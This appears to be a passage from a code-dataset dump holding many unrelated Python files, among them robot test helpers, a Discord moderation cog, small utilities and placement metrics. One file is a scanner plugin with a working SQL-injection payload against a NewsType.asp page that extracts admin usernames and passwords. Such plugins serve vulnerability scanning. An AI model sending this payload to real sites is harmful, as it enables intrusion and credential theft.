textSurface.get_rect()\n\n\ndef message_display(text, screen) :\n\twidth, height = 500, 500 \n\tlargeText = pg.font.Font(\"freesansbold.ttf\", 50)\n\tTextSurf, TextRect = text_object(text, largeText)\n\tTextRect.center = ((width/2), (height/2))\n\tscreen.blit(TextSurf, TextRect)\n\t\n\n","sub_path":"input_processing.py","file_name":"input_processing.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"534805100","text":"\"\"\"\nFunctional test init\n\"\"\"\n\n__author__ = \"ybrun\"\n__copyright__ = \"Copyright August 2013, Aldebaran Robotics\"\n\nimport pytest\nimport time\nimport ssh_tools\nimport posixpath\nfrom os import path\nfrom random import choice\nfrom string import ascii_letters, digits, punctuation\nfrom sleekxmpp import ClientXMPP\nfrom distutils.version import LooseVersion\ntry:\n from qualifcloudsdk import cloud\nexcept ImportError:\n print (\"Module qualifcloudsdk not found. This module is required for Cloud tests. \"\n \"/n /n You can install it via : \"\n \"/n git clone git@git.aldebaran.lan:qualification-tools/qualification-libraries.git\"\n \"/n cd QualifCloudSdk/\"\n \"/n sudo python setup.py install\"\n \"/n sudo pip install qualifcloudsdk\")\n\ndef find_wired(services):\n \"\"\"Returns the service dict of the ethernet connection\"\"\"\n for elem in services:\n d = dict(elem)\n if d[\"Name\"] == \"Wired\":\n return d\n assert False\n\ndef find_wifi(services):\n \"\"\"Returns the service dict of the wifi connection (wifi must be called Now)\"\"\"\n for elem in services:\n d = dict(elem)\n if d[\"Name\"] == \"Now\":\n return d\n assert False\n\ndef randstring(length):\n \"\"\"\n Returns a random string of len length made of uppercase and lowercase letters,\n digits, and usual punctuation\n \"\"\"\n return ''.join(choice(ascii_letters + digits + punctuation) for _ in range(length))\n\ndef install_packages(package_manager, paths):\n \"\"\"\n Installs packages, returns the list of effectively installed packages\n You MUST pass it absolute paths\n \"\"\"\n installed = []\n ssh_tools.send_file(paths)\n names = map(path.basename, paths)\n for name in names:\n try:\n if package_manager.install(posixpath.join(\"/home/nao\", name), \"tester\"):\n installed.append(name)\n else:\n try:\n package_manager.getPackage(name.split(\".\")[0])\n installed.append(name)\n except:\n pass\n except:\n pass\n return installed\n\n\ndef install_package_relative(package_manager, paths):\n \"\"\"\n Installs package and returns the list of effectively installed packages\n\n input: PackageManager proxy, relative path to the file\n \"\"\"\n ssh_tools.send_file(paths)\n pkg = path.basename(paths)\n package_manager.install(\"/home/nao/\" + pkg)\n\n\ndef remove_package(package_manager, name):\n basename = name.split(\".\")[0]\n package_manager.remove(basename)\n ssh_tools.delete(name)\n\nclass EchoBot(ClientXMPP):\n\n def __init__(self, jid, password, reply=False):\n super(EchoBot, self).__init__(jid, password)\n self.add_event_handler('session_start', self.start)\n self.add_event_handler('message', self.message)\n\n def start(self, event):\n self.send_presence()\n self.get_roster()\n\n def message(self, msg):\n if reply:\n rpc = msg['body']\n cmd = rpc.replace(jid, msg['from'])\n msg.reply(cmd).send()\n else:\n operator.notif(msg['body'])\n\ndef set_cloud_image(type_version, vnum1=1, vnum2=22, vnum3=3, vnum4=49, domain=\"cloud-test.aldebaran-robotics.com\"):\n \"\"\" Set the version of the image to download (on the cloud)\n \"\"\"\n sdk = cloud.Cloud(domain)\n sdk.set_credentials(oauth=True)\n response = sdk.post_ade_api_profiles(data={\"name\": \"qualif-sw-tests\",\n \"owner\": \"\",\n \"admins\": \"\"})\n decoded_data = json.loads(response.text)\n pid = decoded_data['id']\n sdk.delete_ade_api_profiles_system(pid)\n sdk.post_ade_api_profiles_system(pid, data={\"filter_type\": type_version,\n \"filter_vnum1\": vnum1,\n \"filter_vnum2\": vnum2,\n \"filter_vnum3\": vnum3,\n \"filter_vnum4\": vnum4})\n sdk.delete_ade_api_profiles(pid)\n\nclass SystemDownloadChecker(object):\n\n \"\"\" Module to catch SystemImageDownloaded event\n \"\"\"\n\n def __init__(self):\n \"\"\" __init__\n \"\"\"\n self.downloaded = False\n\n def getDownloaded(self):\n \"\"\" Getter\n \"\"\"\n return self.downloaded\n\n def test(self, value):\n \"\"\"Callback when SystemImageDownloaded is raised.\n \"\"\"\n self.downloaded = True\n\ndef raiseEventAfterDelay(memory, event, value, delay):\n \"\"\" Created to be used in threads - which allows to raise an event in the\n background after a defined delay (you can do other stuff in the meantime)\n \"\"\"\n time.sleep(delay)\n memory.raiseEvent(event, value)\n\ndef systemNotifIdsWith0arg():\n \"\"\" Return the list of system notification ids which does not need any argument to construct their message\n \"\"\"\n return [12, 110, 111, 120, 200, 201, 202, 203, 204, 205, 214, 215, 400, 401, 402, 404, 405, 500, 501, 600, 712, 725, 726, 730, 731, 800, 801, 802, 803, 805, 806, 810, 900, 901, 902, 903, 920, 921, 922, 923]\n\ndef systemNotifIdsWith1argVersion():\n \"\"\" Return the list of system notification ids which needs one argument (a version number) to construct their message\n \"\"\"\n return [10, 11, 100, 101, 102, 103, 104, 105, 840]\n\ndef systemNotifIdsWith1argDevices():\n \"\"\" Return the list of system notification ids which needs one argument (a list of devices) to construct their message\n \"\"\"\n return [720, 721, 722, 723, 724]\n\ndef systemNotifIdsWith1argApps():\n \"\"\" Return the list of system notification ids which needs one argument (a list of app names) to construct their message\n \"\"\"\n return [830, 832, 834]\n\ndef systemNotifIdsWith2args():\n \"\"\" Return the list of system notification ids which needs two arguments (a number and a list of devices) to construct their message\n \"\"\"\n return [710, 711, 713, 714]\n\ndef systemAllNotifIds():\n \"\"\" Return the list of all existing system notification ids\n \"\"\"\n return systemNotifIdsWith0arg() + systemNotifIdsWith1argVersion() + systemNotifIdsWith1argDevices() + systemNotifIdsWith1argApps() + systemNotifIdsWith2args()\n\ndef argsForSystemId(systemId):\n \"\"\" Return an example of valid arguments corresponding to a system notification id and needed to construct its message\n \"\"\"\n # if 1 arg expected (version number)\n if systemId in systemNotifIdsWith1argVersion():\n return [\"1.2.3\"]\n # if 1 arg expected (list of devices)\n if systemId in systemNotifIdsWith1argDevices():\n return [\"right leg, left arm\"]\n # if 1 arg expected (list of apps)\n if systemId in systemNotifIdsWith1argApps():\n return [\"Cocoro, Awesome dance\"]\n # if 2 args expected (number of devices, list of devices)\n if systemId in systemNotifIdsWith2args():\n return [\"2\", \"right arm, left leg\"]\n # if 0 arg expected\n return []\n\ndef check_alvalue_internal_notification(value):\n \"\"\"\n Description : Checks that value is well formatted.\n \"id\": int higher or equal to -1\n \"severity\": \"error\" or \"warning\" or \"info\"\n \"removeOnRead\": true or false\n \"msgParts\": array of strings\n \"msgArgs\": array of strings\n \"immediate\": true or false\n \"sysId\": int higher or equal to 0\n For example:\n [[\"id\", 2],\n [\"severity\", \"info\"],\n [\"removeOnRead\", true],\n [\"msgParts\", [\"#I could not update my applications.\", \"#They are too %s.\"]],\n [\"msgArgs\", [\"#lame\"]],\n [\"immediate\", false],\n [\"sysId\", 42]]\n \"\"\"\n assert(isinstance(value[\"id\"], long))\n assert(value[\"id\"] >= -1)\n assert(isinstance(value[\"severity\"], str))\n assert(value[\"severity\"] in [\"info\", \"warning\", \"error\"])\n assert(isinstance(value[\"removeOnRead\"], bool))\n assert(isinstance(value[\"msgParts\"], list))\n for msgPart in value[\"msgParts\"]:\n assert(isinstance(msgPart, str))\n assert(isinstance(value[\"msgArgs\"], list))\n for msgArg in value[\"msgArgs\"]:\n assert(isinstance(msgArg, str))\n assert(isinstance(value[\"immediate\"], bool))\n assert(isinstance(value[\"sysId\"], long))\n assert(value[\"sysId\"] >= 0)\n\n\ndef clear_notifications(notification_manager):\n \"\"\"\n Remove all notifications in ALNotificationManager queue\n \"\"\"\n notif_ids = [dict(n)['id'] for n in notification_manager.notifications()]\n for notif_id in notif_ids:\n notification_manager.remove(notif_id)\n\n\ndef compare_systemVersion(version1, version2):\n \"\"\"\n inputs:\n version1: string\n version2: string\n Return:\n true if version1 >= version2\n false if version1 < version2\n Exemple:\n for version1 = '2.5.1.15' and version2 = '2.5.0.20' --> True\n for version1 = '2.5.1.15' and version2 = '2.5.1.120' --> False\n for version1 = '2.5.1.15' and version2 = '2.5.1.15' --> True\n for version1 = '2.5.1.15' and version2 = '2.5.1' --> True\n for version1 = '2.6.1' and version2 = '2.5.0' --> True\n \"\"\"\n return LooseVersion(version1) >= LooseVersion(version2)\n\ndef get_naoqi_version_from_robot():\n \"get NAOqi version from robot\"\n output = ssh_tools.runcommand(\"cat /etc/lsb-release | grep DISTRIB_RELEASE | cut -d'=' -f2\")\n try:\n version_number = \"{}.{}\".format(output.split('.')[0],output.split('.')[1])\n except:\n version_number = \"\"\n return version_number\n","sub_path":"autonomous_abilities/core_tools.py","file_name":"core_tools.py","file_ext":"py","file_size_in_byte":9434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"403979670","text":"from_path = './200604-200611_첨성대벽돌균열/2_정상-비정상-머신러닝적용.ipynb'\nto_path = './200604-200611_첨성대벽돌균열/3_정상-비정상-머신러닝적용.ipynb'\n\n# --------------------------------\n\nimport os\n\n# If directory\nif os.path.isdir(from_path):\n if not os.path.exists(to_path): os.mkdir(to_path)\n\n for file_path in os.listdir(from_path):\n from_file_path = os.path.join(from_path, file_path)\n to_file_path = os.path.join(to_path, file_path)\n\n os.system(f'git mv \"{from_file_path}\" \"{to_file_path}\"')\n\n os.remove(from_path)\n\n# If file\nelse:\n os.system(f'git mv \"{from_path}\" \"{to_path}\"')\n\n# --------------------------------\n\nprint(\"commit title:\", end='\\n')\nprint(f' Rename \"{os.path.basename(from_path)}\" -> \"{os.path.basename(to_path)}\"', end='\\n\\n')\nprint(\"commit description:\", end='\\n')\nprint(f' \"{from_path}\" -> \"{to_path}\"', end='\\n\\n')","sub_path":"util_git-mv.py","file_name":"util_git-mv.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625844820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Lcy\n# @Date: 2016-09-20 15:34:41\n# @Last Modified by: Lcy\n# @Last Modified time: 2016-09-27 16:42:25\nimport requests\nimport re\nclass Exploit:\n def __init__(self,target,expfile):\n self.target = target\n self.result = {\n \"name\": \"南方数据NewsType.asp SQL注入漏洞\",\n \"author\": \"Lcy\",\n \"type\": \"website\",\n \"ref\": \"baidu\",\n \"status\":False,\n \"info\":\"\",\n 'filename':expfile,\n \"target\":target,\n }\n def verify(self):\n file_path = (\"/NewsType.asp?SmallClass=%27%20union%20select%200,chr(126)%2Busername%2BCHR(58)%2Bpassword%2Bchr(126),2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27\")\n verify_url = self.target + file_path\n r = requests.get(verify_url,timeout=5)\n if 'javastr=javastr' in r.text:\n match_result = re.findall(r'>~(.*?)~',r.text)\n if match_result:\n self.result['status'] = True\n self.result['info'] = \"目标存在南方数据NewsType.asp SQL注入漏洞, 验证url: %s\" % verify_url\n ","sub_path":"tools/scanner/lcyscan/exploits/website/liangjin_sqlinject.py","file_name":"liangjin_sqlinject.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"268340356","text":"# coding=utf-8\n\"\"\"Web-based tests for functionality of API Key routing.\"\"\"\nfrom apiphany.api.apis.common.api import Api\nfrom ..common.apiphanytestcase import ApiphanyTestCase\n\n\nclass ModelTests(ApiphanyTestCase):\n def testView(self):\n self.get_application().apis = {\n \"ff\": {\n \"v1\": FakeApi()\n }\n }\n test_client = self.make_test_client()\n rv = test_client.get('/ff/v1/?url=unimportant')\n\n self.assertEqual(rv.status_code, 200)\n self.assertEqual(rv.mimetype, \"application/json\")\n\n\nclass DerivingFakeApi(Api):\n \"\"\"Simple implementation of Api to test superclass functionality.\"\"\"\n\n\nclass FakeApi(object):\n \"\"\"Simple API which returns a FakeResult.\"\"\"\n # noinspection PyUnusedLocal\n @staticmethod\n def get(parameters):\n \"\"\"Always return a FakeResult.\"\"\"\n return FakeResult()\n\n\nclass FakeResult(object):\n \"\"\"Simple result object to test API logic.\"\"\"\n @property\n def is_valid(self):\n \"\"\"Always return True.\"\"\"\n return True\n\n @property\n def json(self):\n \"\"\"Always return an empty JSON object.\"\"\"\n return \"{}\"\n","sub_path":"test/web/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502472905","text":"\nimport random\nimport string\nfrom Tkinter import *\n\ndef test():\n\n\n root = Tk()\n\n def addCheckBox():\n checkBoxName = \"\".join(random.choice(string.letters) for _ in range(10))\n #c = Checkbutton(root, text=checkBoxName)\n\n safety = StringVar(value='none')\n c = Checkbutton(root, text=checkBoxName,variable=safety)\n c.pack()\n\n b = Button(root, text=\"Add a checkbox\", command=addCheckBox)\n b.pack()\n\n root.mainloop()\n\n\n\n","sub_path":"HyperCal/TestTk2.py","file_name":"TestTk2.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500682076","text":"\"\"\"\nQuestions: https://leetcode.com/problems/two-sum/\n\nGiven an array of integers nums and an integer target,\nreturn indices of the two numbers such that they add up to target\nYou may assume that each input would have exactly one solution,\nand you may not use the same element twice.\n\nYou can return the answer in any order.\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n\nConstraints:\n\n2 <= nums.length <= 10^5\n-10^9 <= nums[i] <= 10^9\n-10^9 <= target <= 10^9\n\"\"\"\nfrom typing import List\n\n\ndef two_sum(nums: List[int], target: int) -> List[int]:\n \"\"\"\n Implies that every input will have an answer from the wording of the question\n Constraint that the values in the list are unique as only one solution could exist\n the pair needed to make the target must be there only once.\n\n For this purpose it'd be better to collect the number and the integer that\n would produce the target into a hash table\n \"\"\"\n compliments = dict()\n for idx, cur_val in enumerate(nums):\n need_val = target - cur_val\n\n if need_val in compliments:\n return [compliments[need_val], idx]\n compliments[cur_val] = idx\n return []\n","sub_path":"python/coding_challenges/leet_code/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"77891679","text":"from setuptools import setup, find_packages\n\n\ndef read_requirements(filename):\n with open(filename) as f:\n return [req for req in (req.partition('#')[0].strip() for req in f) if req]\n\n\nsetup(\n name='spinta',\n description='Data store.',\n author='Mantas Zimnickas',\n author_email='sirexas@gmail.com',\n version='0.0.1',\n license='MIT',\n packages=find_packages(),\n package_data={'spinta': ['manifest/*.yml', 'templates/*.html']},\n install_requires=read_requirements('requirements.in'),\n entry_points={\n 'console_scripts': [\n 'spinta = spinta.cli:main',\n ]\n },\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"183075256","text":"#!/usr/bin/env python\nimport socket\n\nHOST = 'localhost'\nPORT = 9900\n\n\ndef client():\n '''\n clent.py will send the 'client.png' to server folder\n '''\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((HOST, PORT))\n\n print('Client connected to the server')\n\n file = open('client.png', \"rb\")\n \n client_socket.sendall(file.read())\n file.close() \n client_socket.close()\n\n\nif __name__ == '__main__':\n client()\n","sub_path":"week02/Assignment1/Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323039965","text":"#!/usr/bin/python3\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QCursor\nfrom PyQt5.QtWidgets import (QApplication,QPushButton, QVBoxLayout, QWidget)\nimport sys,random,time\n\nclass main_window(QWidget):\n\tdef set_rand_pos(self):\n\t\tcursor = QCursor()\n\t\tfor x in range(10):\n\t\t\tcursor.setPos(random.randint(0,500),random.randint(0,500))\n\t\t\ttime.sleep(1)\t\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setWindowTitle(\"Randomator myszy\")\n\t\tself.but = QPushButton(\"Randomizuj\")\n\t\tself.but.clicked.connect(self.set_rand_pos)\n\t\tself.vlayout = QVBoxLayout()\n\t\tself.vlayout.addWidget(self.but)\n\t\tself.setLayout(self.vlayout)\n\nif __name__ == \"__main__\":\n\taplication = QApplication(sys.argv)\n\twindow = main_window()\n\twindow.show()\n\tsys.exit(aplication.exec())\n\n","sub_path":"Pythony/PyQt5_randomator_myszy.py","file_name":"PyQt5_randomator_myszy.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81032144","text":"##\n# @file EvalMetrics.py\n# @author Yibo Lin\n# @date Sep 2018\n# @brief Evaluation metrics \n#\n\nimport time\nimport pdb \n\nclass EvalMetrics (object):\n \"\"\"\n @brief evaluation metrics at one step \n \"\"\"\n def __init__(self, iteration=None):\n \"\"\"\n @brief initialization\n @param iteration optimization step \n \"\"\"\n self.iteration = iteration \n self.wirelength = None\n self.density = None \n self.density_weight = None\n self.hpwl = None \n self.rmst_wl = None\n self.overflow = None\n self.max_density = None\n self.gamma = None\n self.eval_time = None\n\n def __str__(self):\n \"\"\"\n @brief convert to string \n \"\"\"\n content = \"\"\n if self.iteration is not None:\n content = \"iteration %4d\" % (self.iteration)\n if self.wirelength is not None:\n content += \", wirelength %.3E\" % (self.wirelength)\n if self.density is not None: \n content += \", density %.3E\" % (self.density)\n if self.density_weight is not None: \n content += \", density_weight %.6E\" % (self.density_weight)\n if self.hpwl is not None:\n content += \", HPWL %.6E\" % (self.hpwl)\n if self.rmst_wl is not None:\n content += \", RMSTWL %.3E\" % (self.rmst_wl)\n if self.overflow is not None:\n content += \", overflow %.6E\" % (self.overflow)\n if self.max_density is not None:\n content += \", max density %.3E\" % (self.max_density)\n if self.gamma is not None: \n content += \", gamma %.6E\" % (self.gamma)\n if self.eval_time is not None: \n content += \", time %.3fms\" % (self.eval_time*1000)\n\n return content \n\n def __repr__(self):\n \"\"\"\n @brief print \n \"\"\"\n return self.__str__()\n\n def evaluate(self, placedb, ops, var):\n \"\"\"\n @brief evaluate metrics \n @param placedb placement database \n @param ops a list of ops \n @param var variables \n \"\"\"\n tt = time.time()\n if \"wirelength\" in ops:\n self.wirelength = ops[\"wirelength\"](var).data\n if \"density\" in ops:\n self.density = ops[\"density\"](var).data\n if \"hpwl\" in ops:\n self.hpwl = ops[\"hpwl\"](var).data\n if \"rmst_wls\" in ops:\n rmst_wls = ops[\"rmst_wls\"](var)\n self.rmst_wl = rmst_wls.sum().data\n if \"overflow\" in ops:\n overflow, max_density = ops[\"overflow\"](var)\n self.overflow = overflow.data / placedb.total_movable_node_area\n self.max_density = max_density.data \n self.eval_time = time.time()-tt\n","sub_path":"dreamplace/EvalMetrics.py","file_name":"EvalMetrics.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157003318","text":"import asyncio\nimport re\nimport discord\nimport random\n\nfrom typing import Any\nfrom discord.utils import get\n\nfrom redbot.core import Config, checks, bank, modlog, commands\nfrom redbot.core.utils.chat_formatting import pagify, box, warning, error\nfrom redbot.cogs.bank import check_global_setting_guildowner, check_global_setting_admin\n\nfrom redbot.core.bot import Red\n\nCog: Any = getattr(commands, \"Cog\", object)\n\n\nclass Gamers(Cog):\n \"\"\"\n Various custom made commands for NG server.\n \"\"\"\n\n __author__ = \"saurichable\"\n __version__ = \"1.0.0\"\n\n def __init__(self, bot: Red):\n self.bot = bot\n\n # FOR MEMBERS:\n @commands.command()\n @commands.guild_only()\n async def support(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"Opens a support ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=482562270077911070) # PENDING SUPPORT\n role_men = get(ctx.guild.roles, id=482562007443439646) # Mods\n\n await ctx.author.add_roles(role_add)\n await role_men.edit(mentionable=True)\n if not message:\n await ctx.send(\n f\"**Thank you for reaching out to us, {ctx.author.mention}!**\\n\\n{role_men.mention} have been notified that you need \"\n \"assistance.\\n\\n**Problem:** Not specified.\\n*Please state your problem/issue now so we can get to you as soon as possible.\"\n \" If it is personal, state it as well.*\"\n )\n else:\n await ctx.send(\n f\"**Thank you for reaching out to us, {ctx.author.mention}!**\\n\\n{role_men.mention} have been notified that you need assistance.\\n\\n\"\n f\"**Problem:** {message}\"\n )\n await role_men.edit(mentionable=False)\n\n @commands.command()\n @commands.guild_only()\n async def mod(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"Calls Mods.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=482562007443439646) # Mods\n\n await role_men.edit(mentionable=True)\n if not message:\n await ctx.send(f\"{role_men.mention}\")\n else:\n await ctx.send(\n f\"{role_men.mention}\\n{ctx.author.mention}: {message}\"\n )\n await role_men.edit(mentionable=False)\n\n # PING ROLES:\n @commands.command()\n @commands.guild_only()\n async def event(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"For Event hosts only.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=485582775970168832) # Event ping\n\n await ctx.message.delete()\n await role_men.edit(mentionable=True)\n await ctx.send(f\"{role_men.mention}\\n{message}\")\n await role_men.edit(mentionable=False)\n\n @checks.admin_or_permissions(administrator=True)\n @commands.command()\n @commands.guild_only()\n async def poll(self, ctx: commands.Context, *, message=\"\"):\n \"\"\"For Poll hosts only.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_men = get(ctx.guild.roles, id=485756032614793216) # Poll ping\n\n await ctx.message.delete()\n await role_men.edit(mentionable=True)\n await ctx.send(f\"{role_men.mention}\\n{message}\")\n await role_men.edit(mentionable=False)\n\n # FOR MODS:\n @checks.mod_or_permissions(ban_members=True)\n @commands.command()\n @commands.guild_only()\n async def close(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Closes an open ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_rem1 = get(ctx.guild.roles, id=482562270077911070) # PENDING SUPPORT\n role_rem2 = get(ctx.guild.roles, id=519847615882330113) # Personal\n\n await target.remove_roles(role_rem1)\n await target.remove_roles(role_rem2)\n await ctx.send(f\"Successfully closed {target.display_name}'s ticket.\")\n\n @checks.mod_or_permissions(ban_members=True)\n @commands.command()\n @commands.guild_only()\n async def personal(self, ctx: commands.Context, target: discord.Member):\n \"\"\"In case someone has a personal issue.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=519847615882330113) # Personal\n channel_men = get(ctx.guild.channels, id=519848071832535040) # personal-support\n\n await target.add_roles(role_add)\n await ctx.send(\n f\"{target.mention}, move to {channel_men.mention} please.\"\n )\n\n # FOR ME ONLY:\n @checks.is_owner()\n @commands.command()\n @commands.guild_only()\n async def end(self, ctx: commands.Context):\n \"\"\" End the Monthly Competition \"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n five = get(ctx.guild.roles, id=483715523482222613) # 5+\n channel = get(ctx.guild.text_channels, id=483365869565509635) # naughty-bank\n await channel.set_permissions(five, read_messages=True, send_messages=False)\n await ctx.tick()\n await channel.send(\n \"---------------------------------MONTHLY COMPETITION HAS ENDED---------------------------------\"\n )\n\n @checks.is_owner()\n @commands.command()\n @commands.guild_only()\n async def start(self, ctx: commands.Context):\n \"\"\" Start the Monthly Competition \"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n five = get(ctx.guild.roles, id=483715523482222613) # 5+\n channel = get(ctx.guild.text_channels, id=483365869565509635) # naughty-bank\n await channel.set_permissions(five, read_messages=True, send_messages=True)\n await bank.wipe_bank(guild=ctx.guild)\n await ctx.tick()\n await channel.send(\n \"---------------------------------MONTHLY COMPETITION HAS STARTED---------------------------------\"\n )\n\n # NAUGHTY GAMERS SERVER ONLY:\n @commands.command()\n @commands.guild_only()\n async def request(self, ctx: commands.Context):\n \"\"\"Opens a verification ticket.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n av = get(ctx.guild.roles, id=482562076364242944) # Verified\n age1 = get(ctx.guild.roles, id=585837902798520333) # <15\n age2 = get(ctx.guild.roles, id=514129601883275267) # 16-17\n age3 = get(ctx.guild.roles, id=482582198248275995) # 18-21\n age4 = get(ctx.guild.roles, id=482582199204446209) # 22-25\n age5 = get(ctx.guild.roles, id=482582199753900032) # 26-29\n age6 = get(ctx.guild.roles, id=482582200181850123) # 30-34\n age7 = get(ctx.guild.roles, id=482872100420321281) # 35+\n role_men = get(ctx.guild.roles, id=482977157581373465) #'Verifiers' role\n\n if av in ctx.author.roles:\n return await ctx.send(\"You're already verified, what more do you want from me?!\")\n if age1 in ctx.author.roles or age2 in ctx.author.roles:\n return await ctx.send(\"Uh oh, verification is only for people above 18.\")\n if (\n age3 in ctx.author.roles\n or age4 in ctx.author.roles\n or age5 in ctx.author.roles\n or age6 in ctx.author.roles\n or age7 in ctx.author.roles\n ):\n await ctx.author.add_roles(role_add) # Adds 'PENDING VERIFICATION' role\n await role_men.edit(mentionable=True) # Makes 'Verifiers' mentionable\n await ctx.send(\n f\"{role_men.mention}, {ctx.author.mention} would like to get verified.\"\n )\n await role_men.edit(mentionable=False) # Makes 'Verifiers' unmentionable\n else:\n await ctx.send(\n \"Are you sure you've read <#482572215330799627> properly? Because it doesn't look like it.\"\n )\n\n @commands.command(hidden=True)\n @commands.guild_only()\n async def coconut(self, ctx: commands.Context):\n \"\"\"That's a secret.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n await ctx.message.delete()\n\n role_add = get(ctx.guild.roles, id=482693992732164098) #'Secret role' role\n role_rem = get(ctx.guild.roles, id=491277913862176769) #'I can't read' role\n\n if role_rem in ctx.author.roles: # Checks if author has 'I can't read'\n await ctx.author.add_roles(role_add) # Adds 'Secret role'\n await ctx.author.remove_roles(role_rem) # Removes 'I can't read' role\n await ctx.author.send(\n f\"Congratulations, {ctx.author.name}, you can officially read! <:sauriHype:528330460779118603> You have received your 10 cookies!\"\n )\n else:\n await ctx.send(\"Good try.\")\n\n # FOR VERIFIERS:\n @commands.command()\n @commands.guild_only()\n async def v(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Verified\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=482562076364242944) # Verified\n role_rem = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n\n if role_add in target.roles:\n return await ctx.send(f\"Uh oh, {target.mention} is already verified.\")\n if role_rem in target.roles:\n await target.add_roles(role_add) # Adds Verified\n await target.remove_roles(role_rem) # Removes 'PENDING VERIFICATION' role\n await ctx.send(f\"{target.mention}, welcome to the adulthood.\")\n log = get(ctx.guild.text_channels, id=483698888386019335) # mod-log channel\n embed = discord.Embed(\n colour=await ctx.embed_colour(),\n title=\"Verification approved\",\n )\n embed.set_author(\n name=f\"{target.name}#{target.discriminator} ({target.id})\",\n icon_url=target.avatar_url,\n )\n embed.add_field(\n name=\"Moderator:\",\n value=f\"{ctx.author.name}#{ctx.author.discriminator} ({ctx.author.id})\",\n )\n await log.send(embed=embed)\n else:\n await ctx.send(\n f\"Uh oh, {target.display_name} did not request verification.\"\n )\n\n @commands.command()\n @commands.guild_only()\n async def d(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Denies verification.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_rem = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n\n if role_rem in target.roles:\n await target.remove_roles(role_rem) # Removes 'PENDING VERIFICATION' role\n await ctx.send(\"Awww, maybe next time...\")\n log = get(ctx.guild.text_channels, id=483698888386019335) # mod-log channel\n embed = discord.Embed(\n colour=await ctx.embed_colour(), title=\"Verification denied\"\n )\n embed.set_author(\n name=f\"{target.name}#{target.discriminator} ({target.id})\",\n icon_url=target.avatar_url,\n )\n embed.add_field(\n name=\"Moderator:\",\n value=f\"{ctx.author.name}#{ctx.author.discriminator} ({ctx.author.id})\",\n )\n await log.send(embed=embed)\n else:\n await ctx.send(\n f\"Uh oh, {target.display_name} did not request verification.\"\n )\n","sub_path":"gamers/gamers.py","file_name":"gamers.py","file_ext":"py","file_size_in_byte":11713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450921717","text":"#!/usr/bin/python\n\n\nimport json\nimport argparse as ap\nimport os, sys\nfrom datetime import datetime\n\nimport numpy as np\nfrom scipy import stats\nfrom scipy.stats import spearmanr, kurtosis\nfrom math import sqrt\n\nimport warnings\nwarnings.filterwarnings('error')\ndate_format = \"%Y-%m-%d\"\n\nparser = ap.ArgumentParser(description = \"Computes correlations for a \" \\\n \"JSON file containing time series for a term.\")\n\nparser.add_argument( \"-i\", \"--in_file\", type=ap.FileType(\"r\"), default=sys.stdin, help = \\\n \"The JSON file to read time series from. If not specified, standard \" \\\n \"input will be used.\")\n\nparser.add_argument(\"-p\", \"--pretty\", action=\"store_true\", help = \"Pretty print the \" 